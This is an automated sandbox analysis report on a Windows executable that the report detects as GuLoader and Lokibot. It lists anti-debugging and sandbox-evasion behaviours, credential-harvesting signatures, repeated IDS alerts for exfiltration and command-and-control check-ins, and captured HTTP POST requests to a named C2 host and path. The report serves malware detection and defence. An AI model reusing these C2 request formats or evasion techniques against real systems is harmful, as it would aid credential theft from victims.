Loading ...

Play interactive tourEdit tour

Analysis Report PO-A2174679-06.exe

Overview

General Information

Sample Name:PO-A2174679-06.exe
Analysis ID:356484
MD5:fdec289fb4626dd56bbb55770ae5f432
SHA1:1a1f324185e6114fb1362b00f27fe8009a202361
SHA256:eb53256b217e27a7ab0f71be2181599a79dc0569dea7fdbc5b32cf96a6bc9109
Tags:exe

Most interesting Screenshot:

Detection

GuLoader Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Yara detected Lokibot
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • PO-A2174679-06.exe (PID: 6600 cmdline: 'C:\Users\user\Desktop\PO-A2174679-06.exe' MD5: FDEC289FB4626DD56BBB55770AE5F432)
    • PO-A2174679-06.exe (PID: 5424 cmdline: 'C:\Users\user\Desktop\PO-A2174679-06.exe' MD5: FDEC289FB4626DD56BBB55770AE5F432)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
      0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
        Process Memory Space: PO-A2174679-06.exe PID: 5424JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
          Process Memory Space: PO-A2174679-06.exe PID: 5424JoeSecurity_Lokibot_1Yara detected LokibotJoe Security
            Process Memory Space: PO-A2174679-06.exe PID: 5424JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
              Click to see the 2 entries

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for submitted fileShow sources
              Source: PO-A2174679-06.exeVirustotal: Detection: 16%Perma Link

              Compliance:

              barindex
              Uses 32bit PE filesShow sources
              Source: PO-A2174679-06.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49732 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49732 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49732 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49732 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49733 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49733 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49733 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49733 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49734 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49734 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49734 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49734 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49735 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49735 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49735 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49735 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49736 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49736 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49736 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49736 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49737 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49737 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49737 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49737 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49738 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49738 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49738 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49738 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49739 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49739 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49739 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49739 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49740 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49740 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49740 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49740 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49741 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49741 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49741 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49741 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49743 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49743 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49743 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49743 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49744 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49744 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49744 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49744 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49745 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49745 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49745 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49745 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49746 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49746 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49746 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49746 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49747 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49747 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49747 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49747 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49748 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49748 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49753 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49753 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49753 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49753 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49755 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49755 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49759 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49759 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49759 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49759 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49761 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49761 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49761 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49763 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49763 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49763 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49763 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49765 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49765 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49765 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49765 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49766 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49766 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49766 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49766 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49767 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49767 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49767 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49767 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49768 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49768 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49768 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49768 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49769 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49769 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49769 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49769 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49770 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49770 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49770 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49770 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49771 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49771 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49771 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49771 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49772 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49772 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49772 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49772 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49773 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49773 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49773 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49773 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49774 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49774 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49774 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49774 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49775 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49775 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49775 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49775 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49776 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49776 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49776 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49776 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49777 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49777 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49777 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49777 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49778 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49778 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49778 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49778 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49779 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49779 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49779 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49779 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49780 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49780 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49780 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49780 -> 192.185.78.145:80
              Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
